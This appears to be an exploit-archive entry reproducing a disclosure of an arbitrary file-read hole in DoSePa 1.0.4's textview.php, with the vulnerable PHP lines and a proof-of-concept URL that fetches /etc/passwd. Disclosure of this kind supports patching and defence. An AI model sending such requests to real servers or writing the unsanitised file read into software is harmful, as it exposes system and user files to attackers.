####################################################################################### # Target: # # DoSePa 1.0.4 (textview.php) # http://sourceforge.net/project/showfiles.php?group_id=91686 # # Vulnerability: # # Information disclosure. # # Description: # # The textview.php page in DoSePa does not properly sanitize the $_GET['file'] # value; this allows an attacker to view any file to which the server has # read rights. # # Vulnerable Code (truncated): # # $file=$_GET['file']; # file_get_contents($file); # # Exploit: # # http://dosepa.somesite.com/textview.php?file=/etc/passwd # # Discovery: # # Craig Heffner # heffnercj [at] gmail.com # http://www.craigheffner.com #######################################################################################
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论